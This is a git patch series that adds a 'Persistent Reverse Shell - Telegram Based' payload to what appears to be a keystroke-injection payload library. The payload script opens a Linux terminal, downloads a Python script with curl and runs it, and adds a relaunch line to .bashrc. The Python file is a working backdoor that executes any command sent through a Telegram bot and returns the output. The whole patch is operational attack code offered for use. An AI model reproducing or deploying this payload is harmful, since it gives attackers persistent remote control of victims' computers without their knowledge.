From cded1692a8b031e6fd6bcfad7a44d22fec688783 Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 3 Aug 2023 10:35:18 +0200 Subject: [PATCH 1/3] Persistent Reverse Shell - Telegram Based --- .../payload.txt | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt new file mode 100644 index 000000000..7a268a113 --- /dev/null +++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt @@ -0,0 +1,27 @@ +* REM ############################################################ +* REM # # +* REM # Title : Persistent Reverse Shell - Telegram Based # +* REM # Author : Aleff # +* REM # Version : 1.0 # +* REM # Category : Execution # +* REM # Target : Linux # +* REM # # +* REM ############################################################ + +* REM Requirements: +* REM - Internet Connection + +QUACK DELAY 1000 +QUACK CTRL-ALT t +QUACK DELAY 2000 + +* REM Here you must put your own file link. Replace #PYTHON-SCRIPT-LINK with somethign like this https://www.example.com/connection.py +QUACK STRING curl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo "if ! pgrep -f connection.py >/dev/null; then +QUACK ENTER + +QUACK STRING python3 connection.py & +QUACK ENTER + +QUACK STRING fi" >> .bashrc; exit +QUACK ENTER + From c45980c7fda276b9372e730baff7e26585100dca Mon Sep 17 00:00:00 2001 From: aleff-github Date: Thu, 3 Aug 2023 10:36:19 +0200 Subject: [PATCH 2/3] payload --- .../README.md | 41 ++++++++++++++++++ .../connection.py | 43 +++++++++++++++++++ 2 files changed, 84 insertions(+) create mode 100644 payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md create mode 100644 payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md new file mode 100644 index 000000000..ff357e690 --- /dev/null +++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md @@ -0,0 +1,41 @@ +# Persistent Reverse Shell - Telegram Based + +A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot. + +**Category**: Execution + +## Dependencies + +* Internet Connection + +## Description + +A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot. + +This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection. + +The script accept the `/reverse` command using the format `/reverse ` and split `/reverse` from `` trough the `extract_command()` function, then execute the command acquired acquiring the output trough the function `run_command()`. + +Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot. + +## Credits + +

Aleff :octocat:

+
+ + + + + +
+ + + +
Github + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py new file mode 100644 index 000000000..bcb367760 --- /dev/null +++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py @@ -0,0 +1,43 @@ +from telebot import TeleBot, types +import subprocess + +# Set here the Telegram bot token +BOT_TOKEN = "" +bot = TeleBot(BOT_TOKEN) + +commands = [ + types.BotCommand("/reverse", "/reverse ") +] + +bot.set_my_commands(commands=commands) + +@bot.message_handler(commands=['reverse']) +def reverse_shell(message): + command = extract_command(message.text) + if command != "": + print(f"Command received: {command}") + out = run_command(command) + if len(out) > 1000: + bot.reply_to(message, "Message too long...") + chunk_size = 1000 + for i in range(0, len(out), chunk_size): + bot.send_message(message.chat.id, out[i:i+chunk_size]) + else: + bot.reply_to(message, out) + +def extract_command(message): + command_prefix = "/reverse" + if message.startswith(command_prefix): + return message[len(command_prefix):].strip() + else: + return None + +def run_command(command): + try: + result = subprocess.check_output(command, shell=True, text=True) + return result.strip() + except subprocess.CalledProcessError as e: + return f"Some error: {e}" + + +bot.infinity_polling() From 3c909299faabd4cccd01c93732d837b0c6c24226 Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 6 Jun 2024 16:56:08 +0200 Subject: [PATCH 3/3] Adapted to the use of variables [+] Vars [+] ATTACKMODE --- .../Persistent_Reverse_Shell-Telegram_Based/README.md | 2 +- .../payload.txt | 11 ++++++++--- 2 files changed, 9 insertions(+), 4 deletions(-) diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md index ff357e690..8bd1028de 100644 --- a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md +++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md @@ -20,7 +20,7 @@ Because Telegram uses a limited size per message, the script divides the output ## Credits -

Aleff :octocat:

+

Aleff

diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt index 7a268a113..3ffd8fcc7 100644 --- a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt +++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt @@ -8,20 +8,25 @@ * REM # # * REM ############################################################ +ATTACKMODE HID + * REM Requirements: * REM - Internet Connection +QUACK REM VARIABLES +* REM 1) Here you must put your own file link. +PYTHON-SCRIPT-LINK='https://www.example.com/connection.py' + QUACK DELAY 1000 QUACK CTRL-ALT t QUACK DELAY 2000 -* REM Here you must put your own file link. Replace #PYTHON-SCRIPT-LINK with somethign like this https://www.example.com/connection.py -QUACK STRING curl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo "if ! pgrep -f connection.py >/dev/null; then +QUACK STRING curl -o connection.py $PYTHON-SCRIPT-LINK; python3 connection.py; echo \"if ! pgrep -f connection.py >/dev/null; then QUACK ENTER QUACK STRING python3 connection.py & QUACK ENTER -QUACK STRING fi" >> .bashrc; exit +QUACK STRING fi\" >> .bashrc; exit QUACK ENTER